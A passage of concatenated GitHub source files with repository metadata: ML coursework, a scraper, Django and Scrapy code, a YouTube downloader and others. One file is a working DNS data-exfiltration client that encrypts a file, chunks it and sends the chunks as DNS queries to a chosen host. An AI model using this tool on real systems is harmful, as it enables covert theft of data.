frame\n return comb_all\n\nhousing_subsets = get_subsets(housing_df.columns)\nhouse_target = housing['target'] # type np array\n\n\ndef lin_reg(data,target):\n \n feature_names = list(data.columns)\n X = data.to_numpy() # shape: (20640,3)\n y = target # shape: (20640,)\n lin_regressor = LinearRegression()\n lin_regressor.fit(X,y)\n y_hat = lin_regressor.predict(X)\n mse = mean_squared_error(y, y_hat)\n \n return ((feature_names,mse))\n\n\n\ndef lin_reg_subsets():\n min_error = 1000\n for subs in housing_subsets:\n l_r= lin_reg(housing_df[subs],house_target)\n print(l_r)\n if l_r[1] < min_error:\n min_error = l_r[1]\n min_error_set = l_r[0]\n print('\\n')\n print('Min error set: ',min_error_set,'\\n Min error: ',min_error)\n \n \n\n\n#######################\n######## 2.1.2 ########\n#######################\n\n\ndef compute_reconstr_error(array1,array2):\n \"\"\"\n For two arrays, computes the MSE, which in this case constitutes the reconstruction error.\n \n array1: original data\n array2: reconstructed data\n \n 1. Matrix substraction to get matrix of differences for each datapoint in each variable\n 2. Square those differences.\n 3. Sum the squared differences along the columns (axis=1) to obtain vector of summed squared differences\n 4. Compute mean for vector of summed squared differences = MSE\n \n Return MSE\n \"\"\"\n return np.sum((array1-array2)**2,axis=1).mean()\n\n\ndef run_pca(data,pc_num):\n \"\"\"\n For a given dataset and specified number of PCs, run PCA.\n \n data: original dataset\n pc_num: number of principal components (max: number of variables in dataset)\n \n Returns output dictionary of the form:\n \n \"Norm data\": normalised original data\n \"PCA data\": dimensionality reduced data\n \"Reconstr norm data\": the reconstructed data (still normalized)\n \"Reconstr data\": the reconstructed data (normalization reversed)\n \"Reconstr error norm\": error between normalized and reconstructed normalized data\n \"Reconstr error original\": error between original data and reconstructed data (normalization reversed)\n \n \"\"\"\n \n assert pc_num <= data.shape[1],'Number of principal components higher than number of variables'\n \n out_dict = dict()\n \n scaler = StandardScaler()\n scaler_fitted = scaler.fit(data)\n norm_data =scaler_fitted.transform(data)\n \n pca = PCA(n_components=pc_num)\n pca_fitted = pca.fit(norm_data)\n pca_data = pca_fitted.transform(norm_data)\n \n reconstr_norm_data = pca_fitted.inverse_transform(pca_data) # reconstructed from PCA\n reconstr_data =scaler_fitted.inverse_transform(reconstr_norm_data)\n \n reconstr_error_norm = compute_reconstr_error(norm_data, reconstr_norm_data)\n reconstr_error_original = compute_reconstr_error(data, reconstr_data)\n \n out_dict[\"Norm data\"] = norm_data\n out_dict[\"PCA data\"] = pca_data\n out_dict[\"Reconstr norm data\"] = reconstr_norm_data\n out_dict[\"Reconstr data\"] = reconstr_data\n out_dict[\"Reconstr error norm\"] = reconstr_error_norm\n out_dict[\"Reconstr error original\"] = reconstr_error_original\n out_dict[\"Component corrs\"] = pca.components_ # Correlation between PCs and original features \n \n # Selecting the strongest feature correlation for each PC\n out_dict[\"Strongest corrs\"] = []\n for v in out_dict[\"Component corrs\"]:\n v_abs = np.absolute(v)\n v_max= np.max(v_abs)\n ind = np.where(v==v_max)[0][0] # returns int\n out_dict[\"Strongest corrs\"].append(ind)\n \n \n return out_dict\n\n\ndef house_pca_reg():\n \n house_pca = run_pca(housing_df, 3)\n \n # Setting names for the PCs by selecting the strongest feature correlation\n pca_names = []\n for i,k in enumerate(house_pca[\"Strongest corrs\"]):\n pc_num = i+1\n feat_name = housing_df.columns[k]\n pca_names.append('PC '+str(pc_num)+' '+feat_name)\n \n pca_frame = pd.DataFrame(data=house_pca[\"PCA data\"],columns=pca_names)\n print(lin_reg(pca_frame,house_target))\n \n\n\n\n\n#######################\n######## 2.2 ##########\n#######################\n\n\ndef lin_reg_1d(data,target):\n \n out_dict= dict()\n \n feature_name = data.name\n X = data.to_numpy() # shape: (20640,)\n X = X.reshape(-1, 1) # shape: (20640,1)\n y = target # shape: (20640,)\n lin_regressor = LinearRegression()\n lin_regressor.fit(X,y)\n y_hat = lin_regressor.predict(X)\n mse = mean_squared_error(y, y_hat)\n \n out_dict['feature name'] = feature_name\n out_dict['mse'] = mse\n out_dict['X'] = X\n out_dict['y_hat'] = y_hat\n out_dict['y'] = y\n out_dict['coeffs'] = lin_regressor.coef_\n out_dict['intercept'] = lin_regressor.intercept_\n \n return (out_dict)\n \n\ndef subset_PCA_1dim():\n \n #### Subset method ####\n all_linreg_outs = []\n for feat in housing_df.columns: # Do lin reg on every variable\n linreg_out = lin_reg_1d(housing_df[feat], house_target)\n all_linreg_outs.append(linreg_out) # store each out dict\n min_error = 1000\n min_dict =dict()\n for d in all_linreg_outs:\n if d['mse'] < min_error:\n min_error = d['mse']\n min_dict = d\n else:\n continue\n \n print('Subset MSE: ',min_dict['mse'],'\\n')\n \n #### Plot outputs subset ####\n plt.scatter(min_dict['X'],min_dict['y'])\n \n # Compute y_hat values with slope intercept formula\n y_vals = min_dict['intercept'] + min_dict['coeffs']*min_dict['X']\n plt.plot(min_dict['X'],y_vals, color='green',linewidth=3)\n \n # Or directly produce line plot with y_hat values from lin reg (same result)\n #plt.plot(min_dict['X'],min_dict['y_hat'], color='red',linewidth=3)\n \n plt.title('Linear regression subset method')\n plt.ylabel('Price')\n plt.xlabel(min_dict['feature name'])\n plt.show()\n \n #print(min_dict['coeffs'])\n #print(min_dict['intercept'])\n \n #### PCA method ####\n house_pca_1d = run_pca(housing_df, 1)\n pca_1d_frame = pd.Series(data=house_pca_1d['PCA data'].flatten())\n lin_reg_pca = lin_reg_1d(pca_1d_frame,house_target)\n \n print('PCA MSE: ',lin_reg_pca['mse'],'\\n')\n \n #### Plot outputs subset ####\n plt.scatter(lin_reg_pca['X'],lin_reg_pca['y'])\n \n # Compute y_hat values with slope intercept formula\n y_vals = lin_reg_pca['intercept'] + lin_reg_pca['coeffs']*lin_reg_pca['X']\n plt.plot(lin_reg_pca['X'],y_vals, color='yellow',linewidth=3)\n \n # Or directly produce line plot with y_hat values from lin reg (same result)\n #plt.plot(lin_reg_pca['X'],lin_reg_pca['y_hat'], color='red',linewidth=3)\n \n plt.title('Linear regression PCA method')\n plt.ylabel('Price')\n plt.xlabel('PC')\n plt.show()\n \n","repo_name":"lflage/NNIA_22_23","sub_path":"Assignment_3/Solution_A3.py","file_name":"Solution_A3.py","file_ext":"py","file_size_in_byte":7809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27685463170","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# URL of the website you want to capture\ntarget_url = \"https://www.google.com/search?q=anthony+mccall&rlz=1C5CHFA_enKR1016KR1017&source=lnms&tbm=isch&sa=X&ved=2ahUKEwjl5oeik5v9AhXrrokEHYDtCEcQ_AUoAXoECAEQAw&biw=1147&bih=637&dpr=2\"\n\n# Send a GET request to the website\nresponse = requests.get(target_url)\n\n# Check if the request was successful (status code 200)\nif response.status_code == 200:\n # Parse the HTML content of the page\n soup = BeautifulSoup(response.text, 'html.parser')\n\n # Find and extract the content you want\n # (Modify this based on the structure of the target website)\n target_content = soup.find('div', class_='example-class')\n\n # Save the extracted content to a file or display it on your website\n with open(\"path/to/captured_content.html\", \"w\", encoding=\"utf-8\") as file:\n file.write(str(target_content))\nelse:\n print(f\"Failed to retrieve content. Status code: {response.status_code}\")\n","repo_name":"jiho6693/archive","sub_path":"catpure.py","file_name":"catpure.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39119579764","text":"import diplomacy\n\ndef createTestGame():\n territory_list = [\n ['LON', ['PAR', 'VEN', 'MUN', 'MOS', 'BUD', 'ANK']],\n ['PAR', ['LON', 'VEN', 'MUN', 'MOS', 'BUD', 'ANK']],\n ['VEN', ['PAR', 'LON', 'MUN', 'MOS', 'BUD', 'ANK']],\n ['MUN', ['PAR', 'VEN', 'LON', 'MOS', 'BUD', 'ANK']],\n ['MOS', ['PAR', 'VEN', 'MUN', 'LON', 'BUD', 'ANK']],\n ['BUD', ['PAR', 'VEN', 'MUN', 'MOS', 'LON', 'ANK']],\n ['ANK', ['PAR', 'VEN', 'MUN', 'MOS', 'BUD', 'LON']]\n ]\n\n powers_list = [\n ['Austria', [['LON', 'Army'], ['BUD', 'Army']]],\n ['France', [['PAR', 'Army'], ['MOS','None'],['VEN','Army']]]\n ]\n\n order_list = [\n ['LON','Hold'],\n ['BUD','Move', 'MOS'],\n ['PAR','Hold_Support', 'MOS'],\n ['VEN','Move_Support', 'BUD', 'MOS']\n ]\n\n testGame = diplomacy.Game()\n\n testGame.name ='Test Game'\n\n testGame.createTerritoriesFromList(territory_list)\n\n testGame.createPowersWithUnitsFromList(powers_list)\n\n return testGame\n\ndef main ():\n print('diplomacyTests is main')\n\n testGame = createTestGame()\n\n print(testGame)\n\nif __name__ == \"__main__\":\n main ()\n\n\n","repo_name":"NicholasDeLateur/DiplomacyAdjudicator","sub_path":"diplomacyTests.py","file_name":"diplomacyTests.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29488987120","text":"from django.conf.urls import url\nfrom . import views\nfrom vehicle_models.views import AddManufacturer\n\napp_name='showrooms'\n\nurlpatterns=[\n\n\n url(r'^add_model/', AddManufacturer.as_view(), name='add_model'),\n url(r'^newSale/', views.NewSaleView.as_view(), name='newSale'),\n url(r'^processSale/', views.processSale, name='processSale'),\n url(r'^salesList/', views.ListSalesView.as_view(), name='salesList'),\n url(r'^report', views.salesNumber, name='report'),\n url(r'^$', views.ManufacturerListView.as_view(), name='manufacturerLists'),\n url(r'^manufacturer/category/(?P\\d+)/$', views.CategoryListView.as_view(), name='categoryList'),\n url(r'^manufacturer/category/vehicleName/(?P\\d+)/$', views.VehicleNameListView.as_view(), name='vehicleNameList'),\n url(r'^manufacturer/category/vehicleName/models/(?P\\d+)/$', views.ModelListView.as_view(), name='modelList'),\n url(r'^manufacturer/category/vehicleName/models/details/(?P\\d+)/$', views.ModelDetailsView.as_view(), name='modelDetails'),\n\n\n\n\n\n\n\n\n]","repo_name":"RajivSah/ShowRoom","sub_path":"showrooms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22762074434","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\nimport pymysql\nfrom scrapy.utils.project import get_project_settings\n\nclass MaoyanPipeline:\n\n def process_item(self, item, spider):\n film_name = item['film_name']\n film_type = item['film_type']\n plan_date = item['plan_date']\n movies = [(film_name, film_type, plan_date)]\n # 配置文件中读取MySQL配置信息\n settings = get_project_settings()\n dbInfo = settings.get('MYSQL_CONFIG')\n conn = pymysql.connect(\n host=dbInfo['host'],\n port=dbInfo['port'],\n user=dbInfo['user'],\n password=dbInfo['password'],\n db=dbInfo['db']\n )\n cur = conn.cursor()\n sqls = ['create table if not exists maoyanmovies(film_name varchar(255),film_type varchar(255),plan_date varchar(255))']\n try:\n for s in sqls:\n cur.execute(s)\n cur.executemany('insert into maoyanmovies values(%s,%s,%s)', movies)\n cur.close()\n conn.commit()\n except:\n conn.rollback()\n raise Exception('数据插入失败')\n finally:\n conn.close()\n","repo_name":"perceive123/Python004","sub_path":"Week02/homework1/maoyan/maoyan/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"23282799260","text":"import binascii\nimport dns.name\nimport dns.message\nimport dns.query\nimport dns.flags\nimport dns.resolver\nimport time\nimport os.path\nimport base64\nfrom crypto import AES256\n\n\nclass ExfilClient:\n def __init__(self, args):\n self.dest = args.dest\n self.port = args.port\n self.delay = float(args.delay)\n self.file = args.file\n self.packet_size = args.packetsize\n self.ADDITIONAL_RDCLASS = 65535\n self.password = args.password\n\n def run(self):\n # check if file exists\n if not os.path.exists(self.file):\n print(f\"File '{self.file}' does not exist. Aborting\")\n return\n\n # get file name\n filename = os.path.basename(self.file)\n filenamebase64 = base64.b64encode(filename.encode(\"utf-8\")).decode(\"utf-8\")\n\n # read file to buffer\n buffer = bytearray()\n with open(self.file, \"rb\") as f:\n buffer = f.read()\n if len(buffer) == 0:\n print(f\"File '{self.file}' is empty. Aborting\")\n return\n\n print(f\"Read {len(buffer)} bytes from {self.file}\")\n\n # encrypt entire file buffer\n aes = AES256(self.password)\n contents_encrypted = aes.encrypt_bytes(buffer)\n contents_length = len(contents_encrypted)\n\n # split buffer into packets of self.packet_size\n num_packets = int(contents_length / self.packet_size)\n if contents_length % self.packet_size != 0:\n num_packets += 1\n\n packets = []\n for n in range(0, num_packets):\n contents_start = n * self.packet_size\n contents_end = contents_start + self.packet_size\n if contents_end >= contents_length:\n contents_end = contents_length\n packet = contents_encrypted[contents_start:contents_end]\n packets.append(packet)\n\n print(f\"Prepared {len(packets)} packets of {self.packet_size} bytes for exfiltration\")\n\n # send each packet as a dns query to dest:port\n self.send_packet(f\"BEGIN={filenamebase64}\")\n c = 1\n for p in packets:\n domain = p.decode(\"utf-8\") + \"\"\n self.send_packet(domain)\n print(f\"[{c}/{num_packets}]: sent {domain}\")\n time.sleep(self.delay)\n c += 1\n self.send_packet(\"---END---\")\n\n print()\n print(f\"Done! Sent {self.file} in {len(packets)} DNS queries\")\n\n def send_packet(self, domain):\n try:\n # print(f\"Sending packet: {domain}...\")\n domain = dns.name.from_text(domain)\n\n if not domain.is_absolute():\n domain = domain.concatenate(dns.name.root)\n\n request = dns.message.make_query(domain, dns.rdatatype.A)\n request.flags |= dns.flags.AD\n request.find_rrset(request.additional, dns.name.root, self.ADDITIONAL_RDCLASS, dns.rdatatype.OPT, create=True, force_unique=True)\n response = dns.query.udp(request, self.dest, port=self.port, timeout=1, ignore_trailing=True, ignore_unexpected=False)\n\n # print(response.answer)\n # print(response.additional)\n # print(response.authority)\n\n # as of now the ExfilHost sends back a malformed DNS packet. I have yet to fix this. Feel free to contribute.\n # therefore, getting a BadLabelType exception as a response is considered to be a valid response (I know...)\n except dns.name.BadLabelType as e:\n print(\"Success:\", domain)\n\n except dns.name.LabelTooLong:\n print(\"ERROR: DNS label too long! Unable to exfiltrate data. Aborting\")\n return\n\n # this shouldn't happen, but hey\n except Exception as ex:\n pass\n # print(type(ex))\n print(\"General exception:\", ex)\n\n","repo_name":"346pa034/python-dns-data-exfiltrator","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"29377319652","text":"from debugtalks.models import DebugTalks\nfrom projects.models import Projects\n\n\ndef get_projects(datas):\n datas_list = []\n for item in datas:\n projects = DebugTalks.objects.get(id=item[\"id\"]).projects.all()\n if projects:\n item[\"project\"] = \",\".join([project.name for project in projects])\n else:\n item[\"project\"] = \"无所属项目\"\n datas_list.append(item)\n return datas_list\n","repo_name":"op896898466/apitest","sub_path":"apps/debugtalks/untils.py","file_name":"untils.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"38574085518","text":"##########################################################################\n# Author: Jane Curry, jane.curry@skills-1st.co.uk\n# Date: February 24th, 2011\n# Revised:\n#\n# JuniperComponents object class\n#\n# This program can be used under the GNU General Public License version 2\n# You can find full information here: http://www.zenoss.com/oss\n#\n##########################################################################\n\n__doc__=\"\"\"JuniperComponents\n\nJuniperComponents is a component of a JuniperDevice Device\n\n$Id: $\"\"\"\n\n__version__ = \"$Revision: $\"[11:-2]\n\nfrom Globals import DTMLFile\nfrom Globals import InitializeClass\n\nfrom Products.ZenRelations.RelSchema import *\nfrom Products.ZenModel.ZenossSecurity import ZEN_VIEW, ZEN_CHANGE_SETTINGS\n\nfrom Products.ZenModel.DeviceComponent import DeviceComponent\nfrom Products.ZenModel.ManagedEntity import ManagedEntity\n\nimport logging\nlog = logging.getLogger('JuniperComponents')\n\nclass JuniperComponents(DeviceComponent, ManagedEntity):\n \"\"\"Juniper Components object\"\"\"\n\n portal_type = meta_type = 'JuniperComponents'\n \n #**************Custom data Variables here from modeling************************\n \n containerIndex = 1\n containerDescr = ''\n containerParentIndex = 1\n containerParentDescr = ''\n containerType = ''\n containerLevel = 0\n containerNextLevel = 0\n \n #**************END CUSTOM VARIABLES *****************************\n \n \n #************* Those should match this list below *******************\n _properties = (\n {'id':'containerIndex', 'type':'int', 'mode':''},\n {'id':'containerDescr', 'type':'string', 'mode':''},\n {'id':'containerParentIndex', 'type':'int', 'mode':''},\n {'id':'containerParentDescr', 'type':'string', 'mode':''},\n {'id':'containerType', 'type':'string', 'mode':''},\n {'id':'containerLevel', 'type':'int', 'mode':''},\n {'id':'containerNextLevel', 'type':'int', 'mode':''},\n )\n #****************\n \n _relations = (\n (\"JuniperDevComp\", ToOne(ToManyCont,\n \"ZenPacks.ZenSystems.Juniper.JuniperDevice\", \"JuniperComp\")),\n )\n\n factory_type_information = ( \n { \n 'id' : 'JuniperComponents',\n 'meta_type' : 'JuniperComponents',\n 'description' : \"\"\"Juniper Components info\"\"\",\n 'product' : 'Juniper',\n 'immediate_view' : 'viewJuniperComponents',\n 'actions' :\n ( \n { 'id' : 'status'\n , 'name' : 'Juniper Components Graphs'\n , 'action' : 'viewJuniperComponents'\n , 'permissions' : (ZEN_VIEW, )\n },\n { 'id' : 'perfConf'\n , 'name' : 'Juniper Components Template'\n , 'action' : 'objTemplates'\n , 'permissions' : (ZEN_CHANGE_SETTINGS, )\n }, \n { 'id' : 'viewHistory'\n , 'name' : 'Modifications'\n , 'action' : 'viewHistory'\n , 'permissions' : (ZEN_VIEW, )\n },\n )\n },\n ) \n\n isUserCreatedFlag = True\n\n def isUserCreated(self):\n \"\"\"\n Returns the value of isUserCreated. True adds SAVE & CANCEL buttons to Details menu\n \"\"\"\n return self.isUserCreatedFlag\n\n def viewName(self):\n \"\"\"Pretty version human readable version of this object\"\"\"\n return self.id\n\n\n # use viewName as titleOrId because that method is used to display a human\n # readable version of the object in the breadcrumbs\n titleOrId = name = viewName\n\n\n def device(self):\n return self.JuniperDevComp()\n \nInitializeClass(JuniperComponents)\n","repo_name":"zenoss/Community-Zenpacks","sub_path":"ZenPacks.ZenSystems.Juniper/ZenPacks/ZenSystems/Juniper/JuniperComponents.py","file_name":"JuniperComponents.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"4232332237","text":"import numpy as np\nfrom pymoo.core.sampling import Sampling\n\n\nclass InitialStateSampling(Sampling):\n \"\"\"\n Repeat the initial state\n \"\"\"\n\n def __init__(self, type_mask) -> None:\n self.type_mask = type_mask\n super().__init__()\n\n def _do(self, problem, n_samples, **kwargs):\n\n # Retrieve original\n x_clean = problem.x_clean[problem.constraints.mutable_features]\n\n x_generated = np.tile(x_clean, (n_samples, 1))\n\n mask_int = self.type_mask != \"real\"\n\n x_generated[:, mask_int] = np.rint(x_generated[:, mask_int]).astype(\n int\n )\n\n return x_generated\n","repo_name":"serval-uni-lu/constrained-attacks","sub_path":"constrained_attacks/attacks/moeva/operators.py","file_name":"operators.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"7896932778","text":"\"\"\"\n this file that display all features and take valid response from the user\n this features will be as:\n - download specific video with link with a specific resolution if the video have it\n logic of this file will be :\n /*\n 1- the user will ask to enter link of youtube video that want to download\n 2- system will check this is a valid youtube link or not\n 3- if it is not valid link he will go to step 1, else continue\n 4- system will display all resolution are in this video\n 5- the user will ask to enter a valid type, as like as \"mp4\", \"mp3\"\n 6- if not valid will go to step 5, else continue\n 7- user will ask to enter valid resolution for this type\n 8- if not valid will go to step 8, else continue\n 9- then user will ask for the name of the file he wants to download\n 10- then he will ask for location for this file\n 11- then this data will be sent to download video file and start to download\n */\n\"\"\"\n\n# importing the module\nfrom pytube import YouTube\nimport os\n\n# class DownloadVideo:\n# videoObj = \"\"\n# typeToDownload = \"\"\n# res = 0\n# destinationLocation = \"\"\n#\n# def __init__(self, videoObj, typeToDownload, res, destinationLocation):\n# self.destinationLocation = destinationLocation\n# self.res = res\n# self.videoObj = videoObj\n# self.typeToDownload = typeToDownload\n#\n# def __str__(self):\n# return str(self.videoObj.streams.filter(mime_type=self.typeToDownload, resolution=self.res))\n\n\n\nclass VideoData:\n @staticmethod\n def get_video_data():\n videoObj = VideoData.get_video_link()\n dict_streams = VideoData.print_video_res_types(videoObj)\n typeToDownload = VideoData.get_type_video(dict_streams)\n res = VideoData.get_resolution_video(dict_streams, typeToDownload)\n destinationLocation = VideoData.get_valid_location()\n file_name = VideoData.get_file_name()\n\n return videoObj.streams.filter(mime_type= typeToDownload, resolution= res).first(), destinationLocation, file_name\n\n\n @staticmethod\n def get_video_link():\n while True:\n link = input(\"enter link video you want to download : \")\n try:\n yt = YouTube(link)\n break\n except:\n print(\"please enter valid link\")\n return yt\n\n @staticmethod\n def get_type_video(dict_streams):\n while True:\n video_type = input(\"enter video type as \\\"video/3gpp\\\" \\\"audio/mp4\\\" : \")\n if video_type in dict_streams:\n return video_type\n else:\n print(\"please enter valid type as writen before\")\n\n @staticmethod\n def get_resolution_video(dict_streams, type_video):\n while True:\n quality = input(\"enter quality of video or audio you want\")\n if quality in dict_streams[type_video]:\n return quality\n else:\n print(\"please enter valid quality\")\n\n @staticmethod\n def get_valid_location():\n loc = input(\"enter location you want to download in it : \")\n if os.path.exists(loc):\n return loc\n else:\n return VideoData.get_valid_location()\n\n @staticmethod\n def print_video_res_types(video):\n dict_streams = {}\n print(\"this all types and resolution that found\")\n\n for stream in video.streams:\n dict_streams[stream.mime_type] = []\n\n\n for stream_mime_type in dict_streams:\n for stream in video.streams.filter(mime_type = stream_mime_type):\n if stream.resolution:\n dict_streams[stream_mime_type].append(stream.resolution)\n elif stream.audio_codec:\n dict_streams[stream_mime_type].append(stream.audio_codec)\n if dict_streams[stream_mime_type]:\n print(str(stream_mime_type) + \" : \" + str(dict_streams[stream_mime_type]))\n\n return dict_streams\n\n @staticmethod\n def get_file_name():\n name = input(\"enter name of file as you want to save it, to download with the common name enter x\")\n return name\n","repo_name":"mariomalak1/Youtube-Download-Vedio-and-Audio","sub_path":"YoutubeDownlader/GetData.py","file_name":"GetData.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73555393192","text":"import time\nimport bson\ndef ObjectId(id):\n return bson.objectid.ObjectId(id)\ndef get_timestamp():\n return time.time()\n\ndef produce_notice_system_tip(topic,toUser,content):\n if topic == 'tip_finish':\n rcontent = {\n 'tipId':content['tipId'], \n }\n else:\n return None\n notice = {\n 'type':'system',# system/\n 'unit':'tip',#appointment\n 'topic':topic,#order_request/order_finish/order_accept/order_comment\n 'toUser':toUser,\n 'content':rcontent,\n 'time':get_timestamp(),\n 'state':'on',\n 'handled':False,\n }\n return notice\ndef produce_notice_system_appointment(topic,toUser,content):\n if topic == 'order_request' :\n rcontent={\n 'orderId':content['orderId'],\n }\n elif topic == 'order_accept':\n rcontent={\n 'orderId':content['orderId'],\n }\n elif topic == 'order_finish':\n rcontent={\n 'orderId':content['orderId'],\n }\n elif topic == 'order_comment':\n rcontent={\n 'orderId':content['orderId'],\n }\n else:\n return None\n notice={\n 'type':'system',# system/\n 'unit':'appointment',#appointment\n 'topic':topic,#order_request/order_finish/order_accept/order_comment\n 'toUser':toUser,\n 'content':rcontent,\n 'time':get_timestamp(),\n 'state':'on',\n 'handled':False,\n }\n return notice\n \n","repo_name":"Chao-Lu/superman","sub_path":"handler/unit/unit.py","file_name":"unit.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21694192763","text":"import re\nimport random\nimport config\nimport sys\n\nNONE = \"NOTYPE\"\nINT = \"INT\"\nFLOAT = \"FLOAT\"\nBOOL = \"BOOL\"\nFILEPATH = \"FILEPATH\"\nIP = \"IP\"\nPORT = \"PORT\"\nIPPORT = \"IPPORT\"\nCLASSNAME = \"CLASSNAME\"\nDIRPATH = \"DIRPATH\"\nINTLIST = \"INTLIST\"\nSTRLIST = \"STRLIST\"\nTIME = \"TIME\"\nDATA = \"DATA\"\nPM = \"PM\"\nPC = \"PC\"\nZKDIR = \"ZKDIR\"\nZKPORT = \"ZKPORT\"\nZKPORTADDRESS = \"ZKPORTADDRESS\"\nZKLIMIT = \"ZKLIMIT\"\nZKSIZE = \"ZKSIZE\"\nALGO = \"ALGORITHM\"\nUSER = \"USER\"\nGROUP = \"GROUP\"\nNAMESERVICES = \"NAMESERVICES\"\nINTERFACE = \"INTERFACE\"\nPOTENTIALFLOAT = \"POTENTIALFLOAT\"\n\ntimeunits = [\"ms\", \"millisecond\", \"s\", \"sec\", \"second\", \"m\", \"min\", \"minute\", \"h\", \"hr\", \"hour\", \"d\", \"day\"]\ndatasize = [\"MB\"]\nALPHABETS = [\n \"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\", \n \"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\", \n]\n\n# guess from value\ndef isBool(s):\n if s.lower() == \"true\" or s.lower() == \"false\":\n return True\n else:\n return False\n\ndef isPort(name, value):\n if value == \"\" and name.endswith(\".port\"):\n return True\n if isInt(value) and name.endswith(\".port\"):\n return True\n return False\n\ndef isPermissionMask(name, value):\n if len(value) == 3 and \"umask\" in name:\n try:\n _ = int(\"0o\" + value, base=8)\n return True\n except ValueError:\n return False\n\ndef isPermissionCode(s):\n if len(s) == 9:\n m = re.match(r\"^[rwx]+$\", s)\n if m:\n return True\n return False\n\ndef isInt(s):\n try:\n _ = int(s)\n return True\n except ValueError:\n return False\n\ndef isFloat(s):\n m = re.match(r\"^\\d+\\.\\d+[fF]$\", s)\n if m:\n s = s[:-1]\n try:\n _ = float(s)\n return True\n except ValueError:\n return False\n\ndef isIpAddr(s):\n m = re.match(r\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$\", s)\n return m is not None\n\ndef isIpPortAddr(s):\n m = re.match(r\"^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d+$\", s)\n return m is not None\n\ndef isClassName(s):\n return s.startswith(\"org.apache.hadoop\") or s.startswith(\"alluxio.\")\n\ndef isFilePath(s):\n # extend, ${} and \"/\" in dvalue\n if re.match(r\"\\$\\{.*\\}\", s) and \"/\" in s:\n return True\n elif s.startswith(\"/\"):\n return True\n else:\n return \n\ndef isIntList(s):\n elements = s.split(\",\")\n res = True\n for ele in elements:\n res &= isInt(ele)\n return res\n\ndef isStringList(s):\n return s.count(\",\") > 0\n\ndef isTime(s):\n for unit in timeunits:\n if s.endswith(unit):\n t = s[:s.find(unit)]\n if isInt(t):\n return True\n return False\n\ndef isDataSize(s):\n for unit in datasize:\n if s.endswith(unit):\n t = s[:s.find(unit)]\n if isInt(t):\n return True\n return False\n\ndef isAlgorithm(s):\n return s.endswith(\".algorithm\")\n\n# guess from name\ndef isFilePath2(name):\n return name.endswith(\".conf\") or name.endswith('.path')\n\ndef isFilePath3(name):\n return name.endswith(\".file\") or name.endswith(\".file.name\") or name.endswith(\"keytab\")\n\ndef isDirPath(name):\n return name.endswith(\".dir\")\n\ndef isAddr(name):\n return name.endswith(\".addr\") or name.endswith(\".addresses\") or name.endswith(\".hostname\") or name.endswith(\"address\")\n\ndef isClassName2(name):\n return name.endswith(\".class\") or name.endswith(\".classes\")\n\ndef isUser(name):\n return name.endswith(\"user\") or name.endswith(\"users\")\n\ndef isGroup(name):\n return name.endswith(\"group\") or name.endswith(\"groups\")\n\ndef isNameservices(name):\n return name.endswith(\"nameservices\")\n\ndef isInterface(name):\n return name.endswith(\"interface\") or name.endswith(\"interfaces\")\n\ndef isPotentialFloat(name):\n return name.endswith(\"limit\") or name.endswith(\"size\")\n\n# guess from semantics\ndef isFilePath4(semantics):\n return \"relative path\" in semantics or \"directory\" in semantics or \"folder\" in semantics\n\ndef genBool(param):\n upcnt = 0\n lowcnt = 0\n for char in param.dvalue:\n if char.isupper():\n upcnt += 1\n elif char.islower():\n lowcnt += 1\n ret = \"True\"\n if param.dvalue.lower() == \"true\":\n ret = \"False\"\n elif param.dvalue.lower() == \"false\":\n ret = \"True\"\n if upcnt == 0:\n return [ret.lower()]\n elif lowcnt == 0:\n return [ret.upper()]\n else:\n return [ret]\n\ndef genPermissionMask(param):\n return config.PERMISSIONMASKS\n\ndef genPermissionCode(param):\n return config.PERMISSIONCODES\n\ndef genInt(param):\n val = int(param.dvalue)\n sign = 1\n if val < 0:\n sign = -1\n val = -1 * val\n if val == 1:\n return [0, sign*2]\n elif val == 0:\n return [1, -1]\n else:\n if val <= 10:\n return [sign*1, sign*2*val]\n else:\n return [sign*val//2, sign*val*2]\n\ndef genIntList(param):\n vals = param.dvalue.split(\",\")\n l1 = []\n l2 = []\n for val in vals:\n l1.append(int(val)//2)\n l2.append(int(val)*2)\n return [l1, 